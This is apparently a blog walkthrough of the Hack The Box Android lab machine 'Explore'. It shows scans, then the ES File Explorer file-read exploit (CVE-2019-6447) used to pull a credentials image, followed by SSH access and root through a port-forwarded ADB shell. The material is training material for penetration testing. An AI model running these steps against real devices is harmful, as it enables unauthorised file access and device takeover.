Writeup for the easy ranked HTB box Explore

Posted on Oct 30, 2021

box

CVE-2019-6447 | “The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.”

If you never tried hacking Android-devices before this could be a good first box. The credentials found for the User-flag was very CTF-like but I think the box was OK anyway. Tools used for this box was nmap, searchsploit, and adb. The environment I used was a kali-VM (in Parallels Desktop 17) on my MacOS-machine.

Let’s GO!

Reconnaissance

Port scanning with NMAP

Starting of with a standard nmap-scan to find open ports (make sure to always save the output so you can go back later)

┌──(erra㉿kali)-[~/htb/explore]
└─$ sudo nmap -T4 -Pn -p- -A explore.htb -o nmap.init
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-23 19:12 CEST
Nmap scan report for explore.htb (10.10.10.247)
Host is up (0.046s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
35367/tcp open     unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:12:59 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest:
|     HTTP/1.1 412 Precondition Failed
|     Date: Thu, 23 Sep 2021 17:12:59 GMT
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.0 501 Not Implemented
|     Date: Thu, 23 Sep 2021 17:13:04 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:04 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ??random1random2random3random4
|   TerminalServerCookie:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|_    Cookie: mstshash=nmap
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.91%I=7%D=9/23%Time=614CB59B%P=x86_64-pc-linux-gnu%r(NU
SF:LL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port35367-TCP:V=7.91%I=7%D=9/23%Time=614CB59A%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Thu,\x20
SF:23\x20Sep\x202021\x2017:12:59\x20GMT\r\nContent-Length:\x2022\r\nConten
SF:t-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\
SF:r\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412\
SF:x20Precondition\x20Failed\r\nDate:\x20Thu,\x2023\x20Sep\x202021\x2017:1
SF:2:59\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1\
SF:.0\x20501\x20Not\x20Implemented\r\nDate:\x20Thu,\x2023\x20Sep\x202021\x
SF:2017:13:04\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/pla
SF:in;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x2
SF:0supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20R
SF:equest\r\nDate:\x20Thu,\x2023\x20Sep\x202021\x2017:13:04\x20GMT\r\nCont
SF:ent-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r
SF:\nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version:
SF:\x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDa
SF:te:\x20Thu,\x2023\x20Sep\x202021\x2017:13:19\x20GMT\r\nContent-Length:\
SF:x2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection
SF::\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionReq
SF:,DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Thu,\x2023\x20Sep\x
SF:202021\x2017:13:19\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x20
SF:text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid\
SF:x20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\?
SF:\0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalSe
SF:rverCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Thu,\x202
SF:3\x20Sep\x202021\x2017:13:19\x20GMT\r\nContent-Length:\x2054\r\nContent
SF:-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r
SF:\nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20msts
SF:hash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nD
SF:ate:\x20Thu,\x2023\x20Sep\x202021\x2017:13:19\x20GMT\r\nContent-Length:
SF:\x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnectio
SF:n:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\0
SF:e\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=9/23%OT=2222%CT=1%CU=44541%PV=Y%DS=2%DC=T%G=Y%TM=614CB
OS:606%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SE
OS:Q(SP=FC%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O
OS:3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=FFFF%W2=
OS:FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Device: phone

TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   50.53 ms 10.10.14.1
2   50.69 ms explore.htb (10.10.10.247)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.42 seconds

Enumeration

The open ports for this machine is:

  • 2222 - ssh
  • 5555 - freeciv (Civilization game? later found out it is an “Android Debug Bridge”-port)
  • 35367 - ???
  • 42135 - ES File Explorer
  • 59777 - Minecraft server? (Later found out that this was an ES File Explorer port Android uses)

First I thought (as nmap said) that it was a server for Minecraft and freeciv so started of looking for CVE’s for that… but later on I discovered that it was ports for Android-communication (the box is also labeled ‘Android’ so I should have noticed that earlier..). Taking a closer look at the ‘ES File Explorer’ to see if there is any exploits available

┌──(erra㉿kali)-[~/htb/explore]
└─$ searchsploit "ES File Explorer"
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ES File Explorer 4.1.9.7.4 - Arbitrary File Read                                                                            | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                                                                | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                                                                   | windows/remote/20488.txt
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                                                                | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution                         | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access                             | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write                    | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification       | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                                                             | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                                                              | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                                                           | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                                                           | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                                                   | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                                                         | php/webapps/35851.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

From here there was only one exploit that looked interesting, and it was the “ES File Explorer 4.1.9.7.4 - Arbitrary File Read (CVE-2019-6447)”. Arbitrary File Read is a common vulnerability that makes an attacker read files on a system.

Foothold

This POC is straight forward, I tried some commands but the interesting one here was ‘listPics’ where there was a photo called ‘creds.jpg’

#python3 50070.py <command> <IP> [file to download]

######################
# Available Commands #
######################

#listFiles: List all the files
#listPics: List all the pictures
#listVideos: List all the videos
#listAudios: List all the audio files
#listApps: List all the apps installed
#listAppsSystem: List all the system apps
#listAppsPhone: List all the phone apps
#listAppsSdcard: List all the apk files in the sdcard
#listAppsAll: List all the apps installed (system apps included)
#getDeviceInfo: Get device info
#appPull: Pull an app from the device. Package name parameter is needed
#appLaunch: Launch an app. Package name parameter is needed
#getAppThumbnail: Get the icon of an app. Package name parameter is needed

┌──(erra㉿kali)-[~/htb/explore]
└─$ python3 50070.py listPics explore.htb

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

┌──(erra㉿kali)-[~/htb/explore]
└─$ sudo python3 50070.py getFile explore.htb /storage/emulated/0/DCIM/creds.jpg                                                          1==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.

Open the downloaded file ‘creds.jpg’ and we found credentials for the user kristi (yeah very CTF-like) creds

So now we have access via ssh and on htb-easy that usually means we have the USER-flag as well

┌──(erra㉿kali)-[~/htb/explore]
└─$ ssh [email protected] -p 2222                                                                                                      255 ⨯
The authenticity of host '[explore.htb]:2222 ([10.10.10.247]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/erra/.ssh/known_hosts).
Password authentication
Password:
:/ $ whoami
u0_a76
:/ $
:/ $ ls
acct                   init.superuser.rc       sbin
bin                    init.usb.configfs.rc    sdcard
bugreports             init.usb.rc             sepolicy
cache                  init.zygote32.rc        storage
charger                init.zygote64_32.rc     sys
config                 lib                     system
d                      mnt                     ueventd.android_x86_64.rc
data                   odm                     ueventd.rc
default.prop           oem                     vendor
dev                    plat_file_contexts      vendor_file_contexts
etc                    plat_hwservice_contexts vendor_hwservice_contexts
fstab.android_x86_64   plat_property_contexts  vendor_property_contexts
init                   plat_seapp_contexts     vendor_seapp_contexts
init.android_x86_64.rc plat_service_contexts   vendor_service_contexts
init.environ.rc        proc                    vndservice_contexts
init.rc                product
:/ $ ls sdcard/
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/ $ cat sdcard/user.txt
deadbeefdeadbeefdeadbeefdeadbeef
:/ $

I started of by enumerating folders and trying various commands but found nothing so from here I was pretty lost. I started to google around, and since we have a user-account I search for like “android shell privilege escalation” and after a while found this Android pentesting guide. First, we need to install adb (Android Debug Bridge), which is a command-line tool for communicating with Android-devices. The documentation says: “The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device”. Sounds exactly what I need!

After installing adb I tried to just connect to the device, but it didn’t seem to work

┌──(erra㉿kali)-[~]
└─$ adb connect 10.10.10.247:5555
# No output

Scrolling down in the pentest guide and I found out how to port-forward via ssh (just add the -L switch with correct parameters) and then connect via adb

Privilege escalation

# Connect ssh on port 2222 with a port-forward of 5555 via my VM
┌──(erra㉿kali)-[~]
└─$ ssh [email protected] -p 2222 -L 5555:127.0.0.1:5555
# Connect adb to port 5555
┌──(erra㉿kali)-[~]
└─$ adb connect 127.0.0.1:5555
connected to 127.0.0.1:5555
# Connect to the shell
┌──(erra㉿kali)-[~]
└─$ adb shell
x86_64:/ $ whoami
shell
x86_64:/ $
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ cd data
x86_64:/data $ ls
ls: .: Permission denied
1|x86_64:/data $ su
:/ # whoami
root
:/ # cat data/root.txt
deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

And boom, simple as that we have shell-access and after some trial and error I just typed su and escalated to root!

Summary

This box was my first Android-box so from time to time I was pretty lost. But I learned about the adb-tool which was new for me and hopefully I can have use for that somehow later in my career.

Happy hacking!

/Eric (cyberrauken)

Eric

HTB HTB